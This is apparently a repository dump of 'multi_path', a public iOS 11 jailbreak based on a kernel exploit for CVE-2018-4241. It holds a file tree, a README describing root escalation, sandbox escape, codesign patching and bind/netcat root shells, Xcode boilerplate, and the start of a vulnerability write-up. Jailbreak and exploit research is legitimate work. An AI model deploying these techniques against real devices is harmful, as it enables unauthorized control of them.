├── README.md
├── multi_path.xcodeproj
    ├── project.pbxproj
    ├── project.xcworkspace
    │   ├── contents.xcworkspacedata
    │   ├── xcshareddata
    │   │   └── IDEWorkspaceChecks.plist
    │   └── xcuserdata
    │   │   ├── ianbeer.xcuserdatad
    │   │       └── UserInterfaceState.xcuserstate
    │   │   └── jakejames.xcuserdatad
    │   │       └── UserInterfaceState.xcuserstate
    └── xcuserdata
    │   ├── ianbeer.xcuserdatad
    │       └── xcschemes
    │       │   └── xcschememanagement.plist
    │   └── jakejames.xcuserdatad
    │       ├── xcdebugger
    │           └── Breakpoints_v2.xcbkptlist
    │       └── xcschemes
    │           └── xcschememanagement.plist
└── multi_path
    ├── AppDelegate.h
    ├── AppDelegate.m
    ├── Assets.xcassets
        └── AppIcon.appiconset
        │   └── Contents.json
    ├── Base.lproj
        ├── LaunchScreen.storyboard
        └── Main.storyboard
    ├── Info.plist
    ├── README
    ├── ViewController.h
    ├── ViewController.m
    ├── amfid_payload.dylib
    ├── dylibs
        ├── amfid_payload.dylib
        └── dummypass.dylib
    ├── inject_criticald
        ├── AppSupport.tbd
        ├── Ent.plist
        ├── Makefile
        ├── bin
        │   └── inject_criticald
        ├── include
        │   └── AppSupport
        │   │   ├── CPBitmapStore.h
        │   │   └── CPDistributedMessagingCenter.h
        └── inject_criticald.m
    ├── iosbinpack64
        ├── LaunchDaemons
        │   ├── jailbreakd.plist
        │   └── testbin.plist
        ├── bin
        │   ├── amfidebilitate
        │   ├── bash
        │   ├── cat
        │   ├── chmod
        │   ├── cp
        │   ├── date
        │   ├── dd
        │   ├── hostname
        │   ├── jailbreakd
        │   ├── jbclient
        │   ├── kill
        │   ├── launchctl
        │   ├── launchctl_
        │   ├── ln
        │   ├── ls
        │   ├── mkdir
        │   ├── mv
        │   ├── pwd
        │   ├── rm
        │   ├── rmdir
        │   ├── rootme
        │   ├── sh
        │   ├── sleep
        │   ├── stty
        │   ├── sync
        │   └── zsh
        ├── default.ent
        ├── dropbear.plist
        ├── etc
        │   ├── alternatives
        │   │   └── README
        │   ├── apt
        │   │   ├── sources.list.d
        │   │   │   └── saurik.list
        │   │   └── trusted.gpg.d
        │   │   │   ├── bigboss.gpg
        │   │   │   ├── modmyi.gpg
        │   │   │   ├── saurik.gpg
        │   │   │   └── zodttd.gpg
        │   ├── motd
        │   ├── profile
        │   └── zshrc
        ├── makeMeAtHome.sh
        ├── profile
        ├── removeMe.sh
        ├── sbin
        │   ├── dmesg
        │   ├── ifconfig
        │   ├── kextunload
        │   ├── md5
        │   ├── mknod
        │   ├── ping
        │   ├── shutdown
        │   └── umount
        ├── test
        └── usr
        │   ├── bin
        │       ├── amfid_payload.dylib
        │       ├── arch
        │       ├── chflags
        │       ├── clear
        │       ├── cut
        │       ├── du
        │       ├── false
        │       ├── find
        │       ├── fs_usage
        │       ├── grep
        │       ├── gunzip
        │       ├── gzip
        │       ├── head
        │       ├── hexdump
        │       ├── hostinfo
        │       ├── id
        │       ├── inject_criticald
        │       ├── killall
        │       ├── less
        │       ├── login
        │       ├── lsmp
        │       ├── more
        │       ├── nano
        │       ├── nohup
        │       ├── passwd
        │       ├── plconvert
        │       ├── printf
        │       ├── renice
        │       ├── reset
        │       ├── sc_usage
        │       ├── scp
        │       ├── screen
        │       ├── script
        │       ├── sed
        │       ├── seq
        │       ├── split
        │       ├── sqlite3
        │       ├── stat
        │       ├── syslog
        │       ├── tail
        │       ├── tar
        │       ├── tee
        │       ├── time
        │       ├── true
        │       ├── tset
        │       ├── uicache
        │       ├── uname
        │       ├── vim
        │       ├── vm_stat
        │       ├── w
        │       ├── wc
        │       ├── what
        │       ├── which
        │       ├── xargs
        │       └── xxd
        │   ├── local
        │       ├── bin
        │       │   ├── dbclient
        │       │   ├── dropbear
        │       │   ├── dropbear.orig
        │       │   ├── dropbearconvert
        │       │   ├── dropbearkey
        │       │   ├── dropbearmulti
        │       │   ├── filemon
        │       │   ├── jlutil
        │       │   ├── joker
        │       │   ├── jtool
        │       │   ├── procexp
        │       │   ├── procexp.ent
        │       │   ├── qilin.o
        │       │   ├── shaihulud
        │       │   ├── shaihulud.c
        │       │   └── wget
        │       ├── dropbear
        │       ├── dropbear.orig
        │       ├── dropbearconvert
        │       ├── dropbearkey
        │       └── lib
        │       │   └── zsh
        │       │       └── 5.0.8
        │       │           └── zsh
        │       │               ├── attr.so
        │       │               ├── cap.so
        │       │               ├── clone.so
        │       │               ├── compctl.so
        │       │               ├── complete.so
        │       │               ├── complist.so
        │       │               ├── computil.so
        │       │               ├── curses.so
        │       │               ├── datetime.so
        │       │               ├── deltochar.so
        │       │               ├── example.so
        │       │               ├── files.so
        │       │               ├── langinfo.so
        │       │               ├── mapfile.so
        │       │               ├── mathfunc.so
        │       │               ├── newuser.so
        │       │               ├── parameter.so
        │       │               ├── regex.so
        │       │               ├── socket.so
        │       │               ├── stat.so
        │       │               ├── system.so
        │       │               ├── tcp.so
        │       │               ├── termcap.so
        │       │               ├── terminfo.so
        │       │               ├── zftp.so
        │       │               ├── zle.so
        │       │               ├── zleparameter.so
        │       │               ├── zprof.so
        │       │               ├── zpty.so
        │       │               ├── zselect.so
        │       │               └── zutil.so
        │   ├── sbin
        │       ├── chown
        │       ├── ioreg
        │       ├── joreg
        │       ├── kextstat
        │       ├── ltop
        │       ├── netstat
        │       ├── sysctl
        │       └── taskpolicy
        │   └── share
        │       └── terminfo
        │           ├── 61
        │               ├── ansi
        │               ├── ansi+arrows
        │               ├── ansi+csr
        │               ├── ansi+cup
        │               ├── ansi+enq
        │               ├── ansi+erase
        │               ├── ansi+idc
        │               ├── ansi+idl
        │               ├── ansi+idl1
        │               ├── ansi+inittabs
        │               ├── ansi+local
        │               ├── ansi+local1
        │               ├── ansi+pp
        │               ├── ansi+rca
        │               ├── ansi+rep
        │               ├── ansi+sgr
        │               ├── ansi+sgrbold
        │               ├── ansi+sgrdim
        │               ├── ansi+sgrso
        │               ├── ansi+sgrul
        │               ├── ansi+tabs
        │               ├── ansi-color-2-emx
        │               ├── ansi-color-3-emx
        │               ├── ansi-emx
        │               ├── ansi-generic
        │               ├── ansi-m
        │               ├── ansi-mini
        │               ├── ansi-mono
        │               ├── ansi-mr
        │               ├── ansi-mtabs
        │               ├── ansi-nt
        │               ├── ansi.sys
        │               ├── ansi.sys-old
        │               ├── ansi.sysk
        │               ├── ansi43m
        │               ├── ansi77
        │               ├── ansi80x25
        │               ├── ansi80x25-mono
        │               ├── ansi80x25-raw
        │               ├── ansi80x30
        │               ├── ansi80x30-mono
        │               ├── ansi80x43
        │               ├── ansi80x43-mono
        │               ├── ansi80x50
        │               ├── ansi80x50-mono
        │               ├── ansi80x60
        │               ├── ansi80x60-mono
        │               ├── ansil
        │               ├── ansil-mono
        │               ├── ansis
        │               ├── ansis-mono
        │               ├── ansisysk
        │               └── ansiw
        │           ├── 73
        │               ├── screen
        │               ├── screen+fkeys
        │               ├── screen-16color
        │               ├── screen-16color-bce
        │               ├── screen-16color-bce-s
        │               ├── screen-16color-s
        │               ├── screen-256color
        │               ├── screen-256color-bce
        │               ├── screen-256color-bce-s
        │               ├── screen-256color-s
        │               ├── screen-bce
        │               ├── screen-s
        │               ├── screen-w
        │               ├── screen.linux
        │               ├── screen.mlterm
        │               ├── screen.rxvt
        │               ├── screen.teraterm
        │               ├── screen.xterm-new
        │               ├── screen.xterm-r6
        │               ├── screen.xterm-xfree86
        │               ├── screen2
        │               └── screen3
        │           ├── 76
        │               ├── vt100
        │               ├── vt100+
        │               ├── vt100+enq
        │               ├── vt100+fnkeys
        │               ├── vt100+keypad
        │               ├── vt100+pfkeys
        │               ├── vt100-am
        │               ├── vt100-bm
        │               ├── vt100-bm-o
        │               ├── vt100-bot-s
        │               ├── vt100-nam
        │               ├── vt100-nam-w
        │               ├── vt100-nav
        │               ├── vt100-nav-w
        │               ├── vt100-putty
        │               ├── vt100-s
        │               ├── vt100-s-bot
        │               ├── vt100-s-top
        │               ├── vt100-top-s
        │               ├── vt100-vb
        │               ├── vt100-w
        │               ├── vt100-w-am
        │               ├── vt100-w-nam
        │               ├── vt100-w-nav
        │               └── vt100nam
        │           ├── 78
        │               └── xterm-256color
        │           └── 6c
        │               ├── linux
        │               ├── linux-basic
        │               ├── linux-c
        │               ├── linux-c-nc
        │               ├── linux-koi8
        │               ├── linux-koi8r
        │               ├── linux-lat
        │               ├── linux-m
        │               ├── linux-nic
        │               ├── linux-vt
        │               └── linux2.6.26
    ├── jailbreakd
        ├── Makefile
        ├── README.md
        ├── ent.xml
        ├── jailbreakd
        ├── jelbrek.h
        ├── jelbrek.m
        ├── kern_utils.c
        ├── kern_utils.h
        ├── kexecute.h
        ├── kexecute.m
        ├── main.m
        ├── make.sh
        ├── offsetof.c
        ├── offsetof.h
        ├── offsets.h
        ├── offsets.m
        ├── osobject.c
        ├── osobject.h
        ├── patchfinder64.h
        └── patchfinder64.m
    ├── jelbrek
        ├── IOKit.tbd
        ├── QiLin.h
        ├── include
        │   └── IOKit
        │   │   ├── IOKitKeys.h
        │   │   ├── IOKitLib.c
        │   │   ├── IOKitLib.h
        │   │   ├── IOReturn.h
        │   │   ├── IOTypes.h
        │   │   ├── OSMessageNotification.h
        │   │   ├── Readme.md
        │   │   └── screenshot.jpg
        ├── inject_criticald.h
        ├── inject_criticald.m
        ├── jelbrek.h
        ├── jelbrek.m
        ├── kern_utils.h
        ├── kern_utils.m
        ├── kexecute.c
        ├── kexecute.h
        ├── libjb.h
        ├── libjb.m
        ├── offsetof.c
        ├── offsetof.h
        ├── osobject.c
        ├── osobject.h
        ├── patchfinder64.h
        ├── patchfinder64.m
        ├── qilin.o
        ├── remap_tfp_set_hsp.c
        ├── remap_tfp_set_hsp.h
        ├── shell.c
        ├── shell.h
        ├── unlocknvram.c
        └── unlocknvram.h
    ├── kmem.h
    ├── launchctl
        ├── AppSupport.tbd
        ├── Ent.plist
        ├── Makefile
        ├── include
        │   └── AppSupport
        │   │   ├── CPBitmapStore.h
        │   │   └── CPDistributedMessagingCenter.h
        └── main.m
    ├── main.m
    ├── multi_path.entitlements
    ├── offsets.h
    ├── offsets.m
    ├── sploit.c
    ├── sploit.h
    └── test


/README.md:
--------------------------------------------------------------------------------
 1 | # multi_path
 2 | 
 3 | Latest update includes:
 4 | - working "clear" command
 5 | - working "entitle" command for jailbreakd
 6 | - working launchctl (no need to platformize manually! The real launchctl binary is moved and on its place another binary uses jailbreakd to launch it platformized)
 7 | - working "inject_criticald" binary (uses jailbreakd!)
 8 | 
 9 | iOS 11.0-11.3.1 jailbreak. Gets root, escapes sandbox, patches codesign (userland only), bind shell, nvram unlock (from Electra), host_get_special_port 4 (from Electra), code injection (from Electra; injects its amfid patch after using QiLin's since it's way better), SSH (dropbear), a small jailbreakd (inlcudes an example called "rootme", run it and if you get "uid: 0" it worked; check the README on the jailbreakd directory for more info :D)
10 | 
11 | I think at this point this can be called a jailbreak, a developer-only one but with a small little feature: everything is done inside the app's bundle (except /var/dropbear, /var/profile & /var/motd) and nothing outside is touched. This makes it safe to use, without the requirement of full root read and write (although it is enabled on 11.0-11.2.6) and at the same time makes it not conflict with other jailbreaks in any way.
12 | 
13 | Includes TWO root shells :)
14 | 
15 | First is via dropbear (aka SSH) and the other via netcat if dropbear for some reason doesn't work or you prefer it?. You can drop any binaries in the iosbinpack64 directory. All binaries must have at least these two entitlements:
16 | 
17 |     <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
18 |     <plist version="1.0">
19 |     <dict>
20 |         <key>platform-application</key>
21 |         <true/>
22 |         <key>com.apple.private.security.container-required</key>
23 |         <false/>
24 |     </dict>
25 |     </plist>
26 | 
27 | LaunchDaemons are also supported, you can drop their plists in the iosbinpack64/LaunchDaemons directory and they'll get loaded on each run of the app. Type REPLACE_ME when you want to put the absolute path of iosbinpack64, like in the example provided.
28 | 
29 | Future plans include: getting rid of QiLin and implementing everything i need open-source, (already made progress!), fix remounting for 11.3.x (I guess I have no other choice rather than wait for QiLin/LiberiOS/Electra)
30 | 
31 | Credits to: Ian Beer for multi_path and mach_portal, Jonathan Levin for amfid patch, Jonathan Seals for find_kernel_base, Electra Team (especially stek29) and PsychoTea (@iBSparkes)
32 | 


--------------------------------------------------------------------------------
/multi_path.xcodeproj/project.xcworkspace/contents.xcworkspacedata:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <Workspace
3 |    version = "1.0">
4 |    <FileRef
5 |       location = "self:multi_path.xcodeproj">
6 |    </FileRef>
7 | </Workspace>
8 | 


--------------------------------------------------------------------------------
/multi_path.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
3 | <plist version="1.0">
4 | <dict>
5 | 	<key>IDEDidComputeMac32BitWarning</key>
6 | 	<true/>
7 | </dict>
8 | </plist>
9 | 


--------------------------------------------------------------------------------
/multi_path.xcodeproj/project.xcworkspace/xcuserdata/ianbeer.xcuserdatad/UserInterfaceState.xcuserstate:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path.xcodeproj/project.xcworkspace/xcuserdata/ianbeer.xcuserdatad/UserInterfaceState.xcuserstate


--------------------------------------------------------------------------------
/multi_path.xcodeproj/project.xcworkspace/xcuserdata/jakejames.xcuserdatad/UserInterfaceState.xcuserstate:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path.xcodeproj/project.xcworkspace/xcuserdata/jakejames.xcuserdatad/UserInterfaceState.xcuserstate


--------------------------------------------------------------------------------
/multi_path.xcodeproj/xcuserdata/ianbeer.xcuserdatad/xcschemes/xcschememanagement.plist:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 3 | <plist version="1.0">
 4 | <dict>
 5 | 	<key>SchemeUserState</key>
 6 | 	<dict>
 7 | 		<key>multi_path.xcscheme</key>
 8 | 		<dict>
 9 | 			<key>orderHint</key>
10 | 			<integer>0</integer>
11 | 		</dict>
12 | 	</dict>
13 | </dict>
14 | </plist>
15 | 


--------------------------------------------------------------------------------
/multi_path.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="UTF-8"?>
  2 | <Bucket
  3 |    type = "1"
  4 |    version = "2.0">
  5 |    <Breakpoints>
  6 |       <BreakpointProxy
  7 |          BreakpointExtensionID = "Xcode.Breakpoint.FileBreakpoint">
  8 |          <BreakpointContent
  9 |             shouldBeEnabled = "No"
 10 |             ignoreCount = "0"
 11 |             continueAfterRunningActions = "No"
 12 |             filePath = "multi_path/jelbrek/jelbrek.m"
 13 |             timestampString = "552239444.533512"
 14 |             startingColumnNumber = "9223372036854775807"
 15 |             endingColumnNumber = "9223372036854775807"
 16 |             startingLineNumber = "223"
 17 |             endingLineNumber = "223"
 18 |             landmarkName = "remount1131"
 19 |             landmarkType = "9">
 20 |          </BreakpointContent>
 21 |       </BreakpointProxy>
 22 |       <BreakpointProxy
 23 |          BreakpointExtensionID = "Xcode.Breakpoint.FileBreakpoint">
 24 |          <BreakpointContent
 25 |             shouldBeEnabled = "No"
 26 |             ignoreCount = "0"
 27 |             continueAfterRunningActions = "No"
 28 |             filePath = "multi_path/jelbrek/jelbrek.m"
 29 |             timestampString = "552239444.53391"
 30 |             startingColumnNumber = "9223372036854775807"
 31 |             endingColumnNumber = "9223372036854775807"
 32 |             startingLineNumber = "228"
 33 |             endingLineNumber = "228"
 34 |             landmarkName = "remount1131"
 35 |             landmarkType = "9">
 36 |          </BreakpointContent>
 37 |       </BreakpointProxy>
 38 |       <BreakpointProxy
 39 |          BreakpointExtensionID = "Xcode.Breakpoint.FileBreakpoint">
 40 |          <BreakpointContent
 41 |             shouldBeEnabled = "No"
 42 |             ignoreCount = "0"
 43 |             continueAfterRunningActions = "No"
 44 |             filePath = "multi_path/jelbrek/jelbrek.m"
 45 |             timestampString = "552239444.534117"
 46 |             startingColumnNumber = "9223372036854775807"
 47 |             endingColumnNumber = "9223372036854775807"
 48 |             startingLineNumber = "230"
 49 |             endingLineNumber = "230"
 50 |             landmarkName = "remount1131"
 51 |             landmarkType = "9">
 52 |          </BreakpointContent>
 53 |       </BreakpointProxy>
 54 |       <BreakpointProxy
 55 |          BreakpointExtensionID = "Xcode.Breakpoint.FileBreakpoint">
 56 |          <BreakpointContent
 57 |             shouldBeEnabled = "No"
 58 |             ignoreCount = "0"
 59 |             continueAfterRunningActions = "No"
 60 |             filePath = "multi_path/jelbrek/jelbrek.m"
 61 |             timestampString = "552239444.534306"
 62 |             startingColumnNumber = "9223372036854775807"
 63 |             endingColumnNumber = "9223372036854775807"
 64 |             startingLineNumber = "234"
 65 |             endingLineNumber = "234"
 66 |             landmarkName = "remount1131"
 67 |             landmarkType = "9">
 68 |          </BreakpointContent>
 69 |       </BreakpointProxy>
 70 |       <BreakpointProxy
 71 |          BreakpointExtensionID = "Xcode.Breakpoint.FileBreakpoint">
 72 |          <BreakpointContent
 73 |             shouldBeEnabled = "No"
 74 |             ignoreCount = "0"
 75 |             continueAfterRunningActions = "No"
 76 |             filePath = "multi_path/jelbrek/jelbrek.m"
 77 |             timestampString = "552239444.534498"
 78 |             startingColumnNumber = "9223372036854775807"
 79 |             endingColumnNumber = "9223372036854775807"
 80 |             startingLineNumber = "249"
 81 |             endingLineNumber = "249"
 82 |             landmarkName = "remount1131"
 83 |             landmarkType = "9">
 84 |          </BreakpointContent>
 85 |       </BreakpointProxy>
 86 |       <BreakpointProxy
 87 |          BreakpointExtensionID = "Xcode.Breakpoint.FileBreakpoint">
 88 |          <BreakpointContent
 89 |             shouldBeEnabled = "No"
 90 |             ignoreCount = "0"
 91 |             continueAfterRunningActions = "No"
 92 |             filePath = "multi_path/jelbrek/jelbrek.m"
 93 |             timestampString = "552239444.534691"
 94 |             startingColumnNumber = "9223372036854775807"
 95 |             endingColumnNumber = "9223372036854775807"
 96 |             startingLineNumber = "251"
 97 |             endingLineNumber = "251"
 98 |             landmarkName = "remount1131"
 99 |             landmarkType = "9">
100 |          </BreakpointContent>
101 |       </BreakpointProxy>
102 |       <BreakpointProxy
103 |          BreakpointExtensionID = "Xcode.Breakpoint.FileBreakpoint">
104 |          <BreakpointContent
105 |             shouldBeEnabled = "No"
106 |             ignoreCount = "0"
107 |             continueAfterRunningActions = "No"
108 |             filePath = "multi_path/jelbrek/jelbrek.m"
109 |             timestampString = "552239444.53488"
110 |             startingColumnNumber = "9223372036854775807"
111 |             endingColumnNumber = "9223372036854775807"
112 |             startingLineNumber = "255"
113 |             endingLineNumber = "255"
114 |             landmarkName = "remount1131"
115 |             landmarkType = "9">
116 |          </BreakpointContent>
117 |       </BreakpointProxy>
118 |       <BreakpointProxy
119 |          BreakpointExtensionID = "Xcode.Breakpoint.FileBreakpoint">
120 |          <BreakpointContent
121 |             shouldBeEnabled = "No"
122 |             ignoreCount = "0"
123 |             continueAfterRunningActions = "No"
124 |             filePath = "multi_path/jelbrek/jelbrek.m"
125 |             timestampString = "552239444.535066"
126 |             startingColumnNumber = "9223372036854775807"
127 |             endingColumnNumber = "9223372036854775807"
128 |             startingLineNumber = "248"
129 |             endingLineNumber = "248"
130 |             landmarkName = "remount1131"
131 |             landmarkType = "9">
132 |          </BreakpointContent>
133 |       </BreakpointProxy>
134 |    </Breakpoints>
135 | </Bucket>
136 | 


--------------------------------------------------------------------------------
/multi_path.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcschemes/xcschememanagement.plist:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 3 | <plist version="1.0">
 4 | <dict>
 5 | 	<key>SchemeUserState</key>
 6 | 	<dict>
 7 | 		<key>multi_path.xcscheme</key>
 8 | 		<dict>
 9 | 			<key>orderHint</key>
10 | 			<integer>0</integer>
11 | 		</dict>
12 | 	</dict>
13 | </dict>
14 | </plist>
15 | 


--------------------------------------------------------------------------------
/multi_path/AppDelegate.h:
--------------------------------------------------------------------------------
 1 | //
 2 | //  AppDelegate.h
 3 | //  multi_path
 4 | //
 5 | //  Created by Ian Beer on 5/28/18.
 6 | //  Copyright © 2018 Ian Beer. All rights reserved.
 7 | //
 8 | 
 9 | #import <UIKit/UIKit.h>
10 | 
11 | @interface AppDelegate : UIResponder <UIApplicationDelegate>
12 | 
13 | @property (strong, nonatomic) UIWindow *window;
14 | 
15 | 
16 | @end
17 | 
18 | 


--------------------------------------------------------------------------------
/multi_path/AppDelegate.m:
--------------------------------------------------------------------------------
 1 | //
 2 | //  AppDelegate.m
 3 | //  multi_path
 4 | //
 5 | //  Created by Ian Beer on 5/28/18.
 6 | //  Copyright © 2018 Ian Beer. All rights reserved.
 7 | //
 8 | 
 9 | #import "AppDelegate.h"
10 | 
11 | @interface AppDelegate ()
12 | 
13 | @end
14 | 
15 | @implementation AppDelegate
16 | 
17 | 
18 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {
19 |   // Override point for customization after application launch.
20 |   return YES;
21 | }
22 | 
23 | 
24 | - (void)applicationWillResignActive:(UIApplication *)application {
25 |   // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state.
26 |   // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game.
27 | }
28 | 
29 | 
30 | - (void)applicationDidEnterBackground:(UIApplication *)application {
31 |   // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later.
32 |   // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits.
33 | }
34 | 
35 | 
36 | - (void)applicationWillEnterForeground:(UIApplication *)application {
37 |   // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background.
38 | }
39 | 
40 | 
41 | - (void)applicationDidBecomeActive:(UIApplication *)application {
42 |   // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface.
43 | }
44 | 
45 | 
46 | - (void)applicationWillTerminate:(UIApplication *)application {
47 |   // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:.
48 | }
49 | 
50 | 
51 | @end
52 | 


--------------------------------------------------------------------------------
/multi_path/Assets.xcassets/AppIcon.appiconset/Contents.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "images" : [
 3 |     {
 4 |       "idiom" : "iphone",
 5 |       "size" : "20x20",
 6 |       "scale" : "2x"
 7 |     },
 8 |     {
 9 |       "idiom" : "iphone",
10 |       "size" : "20x20",
11 |       "scale" : "3x"
12 |     },
13 |     {
14 |       "idiom" : "iphone",
15 |       "size" : "29x29",
16 |       "scale" : "2x"
17 |     },
18 |     {
19 |       "idiom" : "iphone",
20 |       "size" : "29x29",
21 |       "scale" : "3x"
22 |     },
23 |     {
24 |       "idiom" : "iphone",
25 |       "size" : "40x40",
26 |       "scale" : "2x"
27 |     },
28 |     {
29 |       "idiom" : "iphone",
30 |       "size" : "40x40",
31 |       "scale" : "3x"
32 |     },
33 |     {
34 |       "idiom" : "iphone",
35 |       "size" : "60x60",
36 |       "scale" : "2x"
37 |     },
38 |     {
39 |       "idiom" : "iphone",
40 |       "size" : "60x60",
41 |       "scale" : "3x"
42 |     },
43 |     {
44 |       "idiom" : "ipad",
45 |       "size" : "20x20",
46 |       "scale" : "1x"
47 |     },
48 |     {
49 |       "idiom" : "ipad",
50 |       "size" : "20x20",
51 |       "scale" : "2x"
52 |     },
53 |     {
54 |       "idiom" : "ipad",
55 |       "size" : "29x29",
56 |       "scale" : "1x"
57 |     },
58 |     {
59 |       "idiom" : "ipad",
60 |       "size" : "29x29",
61 |       "scale" : "2x"
62 |     },
63 |     {
64 |       "idiom" : "ipad",
65 |       "size" : "40x40",
66 |       "scale" : "1x"
67 |     },
68 |     {
69 |       "idiom" : "ipad",
70 |       "size" : "40x40",
71 |       "scale" : "2x"
72 |     },
73 |     {
74 |       "idiom" : "ipad",
75 |       "size" : "76x76",
76 |       "scale" : "1x"
77 |     },
78 |     {
79 |       "idiom" : "ipad",
80 |       "size" : "76x76",
81 |       "scale" : "2x"
82 |     },
83 |     {
84 |       "idiom" : "ipad",
85 |       "size" : "83.5x83.5",
86 |       "scale" : "2x"
87 |     }
88 |   ],
89 |   "info" : {
90 |     "version" : 1,
91 |     "author" : "xcode"
92 |   }
93 | }


--------------------------------------------------------------------------------
/multi_path/Base.lproj/LaunchScreen.storyboard:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8" standalone="no"?>
 2 | <document type="com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB" version="3.0" toolsVersion="13122.16" systemVersion="17A277" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" launchScreen="YES" useTraitCollections="YES" useSafeAreas="YES" colorMatched="YES" initialViewController="01J-lp-oVM">
 3 |     <dependencies>
 4 |         <plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="13104.12"/>
 5 |         <capability name="Safe area layout guides" minToolsVersion="9.0"/>
 6 |         <capability name="documents saved in the Xcode 8 format" minToolsVersion="8.0"/>
 7 |     </dependencies>
 8 |     <scenes>
 9 |         <!--View Controller-->
10 |         <scene sceneID="EHf-IW-A2E">
11 |             <objects>
12 |                 <viewController id="01J-lp-oVM" sceneMemberID="viewController">
13 |                     <view key="view" contentMode="scaleToFill" id="Ze5-6b-2t3">
14 |                         <rect key="frame" x="0.0" y="0.0" width="375" height="667"/>
15 |                         <autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
16 |                         <color key="backgroundColor" red="1" green="1" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
17 |                         <viewLayoutGuide key="safeArea" id="6Tk-OE-BBY"/>
18 |                     </view>
19 |                 </viewController>
20 |                 <placeholder placeholderIdentifier="IBFirstResponder" id="iYj-Kq-Ea1" userLabel="First Responder" sceneMemberID="firstResponder"/>
21 |             </objects>
22 |             <point key="canvasLocation" x="53" y="375"/>
23 |         </scene>
24 |     </scenes>
25 | </document>
26 | 


--------------------------------------------------------------------------------
/multi_path/Info.plist:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 3 | <plist version="1.0">
 4 | <dict>
 5 | 	<key>CFBundleDevelopmentRegion</key>
 6 | 	<string>$(DEVELOPMENT_LANGUAGE)</string>
 7 | 	<key>CFBundleExecutable</key>
 8 | 	<string>$(EXECUTABLE_NAME)</string>
 9 | 	<key>CFBundleIdentifier</key>
10 | 	<string>$(PRODUCT_BUNDLE_IDENTIFIER)</string>
11 | 	<key>CFBundleInfoDictionaryVersion</key>
12 | 	<string>6.0</string>
13 | 	<key>CFBundleName</key>
14 | 	<string>$(PRODUCT_NAME)</string>
15 | 	<key>CFBundlePackageType</key>
16 | 	<string>APPL</string>
17 | 	<key>CFBundleShortVersionString</key>
18 | 	<string>1.0</string>
19 | 	<key>CFBundleVersion</key>
20 | 	<string>1</string>
21 | 	<key>LSRequiresIPhoneOS</key>
22 | 	<true/>
23 | 	<key>UILaunchStoryboardName</key>
24 | 	<string>LaunchScreen</string>
25 | 	<key>UIMainStoryboardFile</key>
26 | 	<string>Main</string>
27 | 	<key>UIRequiredDeviceCapabilities</key>
28 | 	<array>
29 | 		<string>armv7</string>
30 | 	</array>
31 | 	<key>UISupportedInterfaceOrientations</key>
32 | 	<array>
33 | 		<string>UIInterfaceOrientationPortrait</string>
34 | 		<string>UIInterfaceOrientationLandscapeLeft</string>
35 | 		<string>UIInterfaceOrientationLandscapeRight</string>
36 | 	</array>
37 | 	<key>UISupportedInterfaceOrientations~ipad</key>
38 | 	<array>
39 | 		<string>UIInterfaceOrientationPortrait</string>
40 | 		<string>UIInterfaceOrientationPortraitUpsideDown</string>
41 | 		<string>UIInterfaceOrientationLandscapeLeft</string>
42 | 		<string>UIInterfaceOrientationLandscapeRight</string>
43 | 	</array>
44 | </dict>
45 | </plist>
46 | 


--------------------------------------------------------------------------------
/multi_path/README:
--------------------------------------------------------------------------------
  1 | multi_path - exploit for p0 issue 1558 (CVE-2018-4241)
  2 | @i41nbeer
  3 | 
  4 | mptcp_usr_connectx is the handler for the connectx syscall for the AP_MULTIPATH socket family.
  5 | 
  6 | The logic of this function fails to correctly handle source and destination sockaddrs which aren't
  7 | AF_INET or AF_INET6:
  8 | 
  9 | //***************
 10 |   // verify sa_len for AF_INET:
 11 | 
 12 |   if (dst->sa_family == AF_INET &&
 13 |       dst->sa_len != sizeof(mpte->__mpte_dst_v4)) {
 14 |     mptcplog((LOG_ERR, "%s IPv4 dst len %u\n", __func__, dst->sa_len), MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);
 15 |     error = EINVAL;
 16 |     goto out;
 17 |   }
 18 | 
